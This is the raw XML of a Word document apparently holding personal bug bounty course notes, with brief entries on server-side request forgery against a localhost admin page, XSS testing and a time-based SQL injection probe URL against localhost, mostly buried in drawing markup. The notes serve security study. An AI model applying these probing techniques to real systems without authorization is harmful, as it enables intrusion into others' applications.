                          <a:chExt cx="6581774" cy="9525"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6733" name="Shape 6733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2" style="width:518.25pt;height:0.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817,95">
                <v:shape id="Shape 6734" style="position:absolute;width:65817;height:95;left:0;top:0;" coordsize="6581774,9525" path="m0,0l6581774,0l658177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235F5F54" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="687"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>SSRF 0x01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD8E7BE" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="153"/>
        <w:ind w:lef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1FB8AD" wp14:editId="4DFC89C8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>95250</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-276974</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="285750" cy="933450"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="4204" name="Group 4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933450"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="285750" cy="933450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2381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238125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796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23812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04" style="width:22.5pt;height:73.5pt;position:absolute;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:7.5pt;mso-position-vertical-relative:text;margin-top:-21.8091pt;" coordsize="2857,9334">
                <v:shape id="Shape 528" style="position:absolute;width:476;height:476;left:0;top:0;" coordsize="47625,47625" path="m23813,0c26970,0,30008,608,32925,1811c35843,3014,38418,4738,40651,6970c42883,9203,44604,11776,45812,14691c47021,17611,47625,20650,47625,23813c47625,26969,47021,30001,45812,32922c44604,35837,42883,38410,40651,40649c38418,42875,35843,44599,32925,45808c30008,47017,26970,47619,23813,47625c20655,47619,17617,47017,14700,45808c11783,44599,9207,42875,6975,40649c4742,38410,3021,35837,1813,32916c604,30001,0,26969,0,23813c0,20650,604,17611,1813,14691c3021,11776,4742,9203,6975,6970c9207,4738,11783,3014,14700,1811c17617,608,20655,0,23813,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="4" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#32373f"/>
                </v:shape>
                <v:shape id="Shape 529" style="position:absolute;width:476;height:476;left:2381;top:3143;" coordsize="47625,47625" path="m47625,23813c47625,26969,47021,30001,45812,32922c44604,35830,42883,38410,40650,40642c38418,42875,35842,44593,32925,45802c30008,47011,26970,47619,23813,47625c20655,47619,17617,47011,14700,45802c11783,44593,9207,42875,6975,40642c4742,38410,3021,35830,1813,32922c604,30001,0,26969,0,23813c0,20650,604,17611,1813,14691c3021,11776,4742,9203,6975,6970c9207,4738,11783,3014,14700,1811c17617,608,20655,0,23813,0c26970,0,30008,608,32925,1811c35842,3014,38418,4738,40650,6970c42883,9203,44604,11770,45812,14691c47021,17611,47625,20650,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373f"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 531" style="position:absolute;width:476;height:476;left:2381;top:6000;" coordsize="47625,47625" path="m47625,23813c47625,26963,47021,30001,45812,32916c44604,35830,42883,38410,40650,40642c38418,42875,35842,44593,32925,45796c30008,47011,26970,47619,23813,47625c20655,47619,17617,47011,14700,45802c11783,44593,9207,42875,6975,40642c4742,38410,3021,35830,1813,32916c604,30001,0,26963,0,23813c0,20656,604,17611,1813,14691c3021,11770,4742,9196,6975,6970c9207,4738,11783,3014,14700,1805c17617,602,20655,0,23813,0c26970,0,30008,602,32925,1798c35842,3014,38418,4738,40650,6970c42883,9196,44604,11770,45812,14691c47021,17611,47625,20656,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373f"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 547" style="position:absolute;width:476;height:476;left:2381;top:8858;" coordsize="47625,47625" path="m47625,23813c47625,26969,47021,30001,45812,32916c44604,35830,42883,38410,40650,40642c38418,42875,35842,44593,32925,45802c30008,47017,26970,47619,23813,47625c20655,47619,17617,47017,14700,45808c11783,44593,9207,42875,6975,40642c4742,38410,3021,35830,1813,32916c604,30001,0,26969,0,23813c0,20650,604,17611,1813,14691c3021,11770,4742,9196,6975,6970c9207,4738,11783,3014,14700,1805c17617,602,20655,0,23813,0c26970,0,30008,602,32925,1805c35842,3014,38418,4738,40650,6970c42883,9196,44604,11770,45812,14691c47021,17611,47625,20650,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373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32373F"/>
        </w:rPr>
        <w:t>URL in a request to the application on our behalf.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483F2FC7" w14:textId="0B4499C5" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="153"/>
        <w:ind w:left="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve">In that </w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> we try to access admin </w:t>
      </w:r>
      <w:hyperlink r:id="rId29">
        <w:r w:rsidR="00AB6EF2">
          <w:rPr>
            <w:b/>
            <w:i/>
            <w:color w:val="155BDA"/>
            <w:u w:val="single" w:color="155BDA"/>
          </w:rPr>
          <w:t>http://localhost/*****labs/admin.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3B18B145" w14:textId="622AF37C" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="153"/>
        <w:ind w:left="160" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve">Also look for </w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>Ip’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5584F3" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2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3E9BB0" wp14:editId="38E7AD91">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>495300</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>352425</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6581774" cy="19050"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="3809" name="Group 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19050"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="19050"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6735" name="Shape 6735"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="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09" style="width:518.25pt;height:1.5pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:39pt;mso-position-vertical-relative:page;margin-top:27.75pt;" coordsize="65817,190">
                <v:shape id="Shape 6736" style="position:absolute;width:65817;height:190;left:0;top:0;" coordsize="6581774,19050" path="m0,0l6581774,0l6581774,19050l0,19050l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#dddddd"/>
                </v:shape>
                <w10:wrap type="topAndBottom"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>SSRF 0x02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DA32CD" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="309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2AFA6C9E" wp14:editId="6425B42D">
                <wp:extent cx="6581774" cy="647700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647700"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="647700"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6737" name="Shape 6737"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="53340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" name="Shape 6738"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="6286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952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3337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485775" y="276975"/>
                            <a:ext cx="6915269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DD257" w14:textId="3AC7C0B1" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="109"/>
                                </w:rPr>
                                <w:t>We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can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send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EC2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9"/>
                                </w:rPr>
                                <w:t>instance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or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collaborator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give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that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url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place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test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9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A6C9E" id="Group 3810" o:spid="_x0000_s1229" style="width:518.25pt;height:51pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817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">
                <v:shape id="Shape 6737" o:spid="_x0000_s1230" style="position:absolute;top:5334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6738" o:spid="_x0000_s1231" style="position:absolute;top:6286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565" o:spid="_x0000_s1232" style="position:absolute;left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" path="m23813,v3157,,6195,602,9112,1805c35843,3014,38418,4738,40651,6970v2232,2233,3953,4806,5161,7721c47021,17611,47625,20650,47625,23813v,3156,-604,6188,-1813,9109c44604,35830,42883,38410,40651,40642v-2233,2233,-4808,3951,-7726,5160c30008,47011,26970,47619,23813,47625v-3158,-6,-6196,-614,-9113,-1823c11783,44593,9207,42875,6975,40642,4742,38410,3021,35830,1813,32922,604,30001,,26969,,23813,,20650,604,17611,1813,14691,3021,11776,4742,9203,6975,6970,9207,4738,11783,3014,14700,1805,17617,602,20655,,23813,xe" fillcolor="#32373f" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:shape id="Shape 566" o:spid="_x0000_s1233" style="position:absolute;left:3333;top:314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" path="m47625,23813v,3150,-604,6188,-1813,9103c44604,35830,42883,38410,40650,40642v-2232,2233,-4808,3951,-7725,5160c30008,47011,26970,47619,23813,47625v-3158,-6,-6196,-614,-9113,-1823c11783,44593,9207,42875,6975,40642,4742,38410,3021,35830,1813,32916,604,30001,,26963,,23813,,20656,604,17611,1813,14691,3021,11770,4742,9196,6975,6970,9207,4738,11783,3014,14700,1805,17617,602,20655,,23813,v3157,,6195,602,9112,1798c35842,3014,38418,4738,40650,6970v2233,2226,3954,4800,5162,7721c47021,17611,47625,20656,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 567" o:spid="_x0000_s1234" style="position:absolute;left:4857;top:2769;width:6915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5B1DD257" w14:textId="3AC7C0B1" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="109"/>
                          </w:rPr>
                          <w:t>We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can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send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EC2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9"/>
                          </w:rPr>
                          <w:t>instance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or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collaborator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give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that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url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in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the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place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and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test</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/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9"/>
                          </w:rPr>
                          <w:t>it.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DB91C1" w14:textId="7D34505E" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Input validation and </w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:t>filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F736431" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="-120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="157E06D4" wp14:editId="1ED8BCBF">
                <wp:extent cx="6581774" cy="981075"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"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4" cy="981075"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="981075"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6809" name="Shape 6809"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6581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9525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0" name="Shape 6810"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="78105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1" name="Shape 6811"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="876300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2" name="Shape 6812"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="962025"/>
                            <a:ext cx="65817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4" h="19050">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6581774" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="65817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95250" y="238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7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333375" y="552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7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85775" y="515100"/>
                            <a:ext cx="4861564" cy="17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7EE3E" w14:textId="13B474C5" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="108"/>
                                </w:rPr>
                                <w:t>Try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using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8"/>
                                </w:rPr>
                                <w:t>different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XSS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scripts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 w:rsidR="00303E9F">
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="108"/>
                                </w:rPr>
                                <w:t>different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level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32373F"/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32373F"/>
                                  <w:w w:val="108"/>
                                </w:rPr>
                                <w:t>security.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E06D4" id="Group 3811" o:spid="_x0000_s1235" style="width:518.25pt;height:77.25pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817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">
                <v:shape id="Shape 6809" o:spid="_x0000_s1236" style="position:absolute;width:65817;height:95;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="658177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" path="m,l6581774,r,9525l,9525,,e" fillcolor="#ddd" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,6581774,9525"/>
                </v:shape>
                <v:shape id="Shape 6810" o:spid="_x0000_s1237" style="position:absolute;top:7810;width:65817;height:191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6811" o:spid="_x0000_s1238" style="position:absolute;top:8763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6812" o:spid="_x0000_s1239" style="position:absolute;top:9620;width:65817;height:190;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="65817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" path="m,l6581774,r,19050l,19050,,e" fillcolor="#ddd" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,6581774,19050"/>
                </v:shape>
                <v:shape id="Shape 569" o:spid="_x0000_s1240" style="position:absolute;left:952;top:238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" path="m23813,v3157,,6195,602,9112,1805c35843,3014,38418,4738,40651,6970v2232,2233,3953,4806,5161,7721c47021,17611,47625,20656,47625,23813v,3156,-604,6188,-1813,9109c44604,35837,42883,38410,40651,40649v-2233,2226,-4808,3944,-7726,5159c30008,47011,26970,47619,23813,47625v-3158,-6,-6196,-614,-9113,-1823c11783,44593,9207,42875,6975,40649,4742,38410,3021,35837,1813,32922,604,30001,,26969,,23813,,20656,604,17611,1813,14697,3021,11776,4742,9203,6975,6970,9207,4738,11783,3014,14700,1805,17617,602,20655,,23813,xe" fillcolor="#32373f" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:shape id="Shape 570" o:spid="_x0000_s1241" style="position:absolute;left:3333;top:552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" path="m47625,23813v,3150,-604,6188,-1813,9103c44604,35830,42883,38410,40650,40642v-2232,2233,-4808,3957,-7725,5166c30008,47011,26970,47619,23813,47625v-3158,-6,-6196,-614,-9113,-1817c11783,44599,9207,42875,6975,40642,4742,38410,3021,35830,1813,32916,604,30001,,26963,,23813,,20656,604,17611,1813,14697,3021,11776,4742,9203,6975,6970,9207,4738,11783,3014,14700,1811,17617,608,20655,,23813,v3157,,6195,608,9112,1811c35842,3014,38418,4738,40650,6970v2233,2233,3954,4806,5162,7721c47021,17611,47625,20656,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 571" o:spid="_x0000_s1242" style="position:absolute;left:4857;top:5151;width:4861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0937EE3E" w14:textId="13B474C5" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="108"/>
                          </w:rPr>
                          <w:t>Try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using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8"/>
                          </w:rPr>
                          <w:t>different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XSS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scripts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with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 w:rsidR="00303E9F">
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="108"/>
                          </w:rPr>
                          <w:t>different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level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of</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/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32373F"/>
                            <w:w w:val="108"/>
                          </w:rPr>
                          <w:t>security.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0A7EFE" w14:textId="77777777" w:rsidR="00303E9F" w:rsidRDefault="00303E9F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="-120"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00303E9F">
      <w:pgSz w:w="11918" w:h="16858"/>
      <w:pgMar w:top="646" w:right="893" w:bottom="62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A4E2A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA487FA2"/>
    <w:lvl w:ilvl="0" w:tplc="E5E2933C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="638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64C902">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2241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236B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2961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228644">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3681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D0F322">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4401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527792">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5121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296FA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5841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2AB93E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6561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4438E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7281"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        <w:b w:val="0"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162637"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0C8CB66C"/>
    <w:lvl w:ilvl="0" w:tplc="F738AD92">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="713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584F34">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1845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2C8EC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2565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722202">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3285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8469AE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4005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C60E30">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4725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CE7D3A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5445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DCFAC2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6165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C7546">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6885"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:b/>
        <w:bCs/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="3237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0447931">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="28292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F2"/>
    <w:rsid w:val="00003A19"/>
    <w:rsid w:val="00303E9F"/>
    <w:rsid w:val="00866161"/>
    <w:rsid w:val="008C1BC4"/>
    <w:rsid w:val="008F5611"/>
    <w:rsid w:val="00AB6EF2"/>
    <w:rsid w:val="00F0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D0A2"/>
  <w15:docId w15:val="{EB504251-5636-4DD2-B5E3-C88903A0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2373F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" w:line="265" w:lineRule="auto"/>
      <w:ind w:left="10" w:hanging="10"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:color w:val="32373F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2" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="1157" w:hanging="10"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:color w:val="32373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2373F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2373F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2373F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ecexplained.gitbook.io/appsecexplained/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://appsecexplained.gitbook.io/appsecexplained/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://appsecexplained.gitbook.io/appsecexplained/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/?q=%27sle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" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://appsecexplained.gitbook.io/appsecexplained/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://appsecexplained.gitbook.io/appsecexplained/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://appsecexplained.gitbook.io/appsecexplained/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/?q=%27sleep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ecexplained.gitbook.io/appsecexplained/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/*****labs/admi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secexplained.gitbook.io/appsecexplained/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://appsecexplained.gitbook.io/appsecexplained/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/?q=%27sleep" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://appsecexplained.gitbook.io/appsecexplained/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/labs/FUZZ" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://appsecexplained.gitbook.io/appsecexplained/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://appsecexplained.gitbook.io/appsecexplained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secexplained.gitbook.io/appsecexplained/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://appsecexplained.gitbook.io/appsecexplained/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/?q=%27slee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TCM Bog Bounty</vt:lpstr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TCM Bog Bounty</dc:title>
  <dc:subject/>
  <dc:creator>KAVISHVAR KS</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>KAVISHVAR KS</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-14T06:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-14T06:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>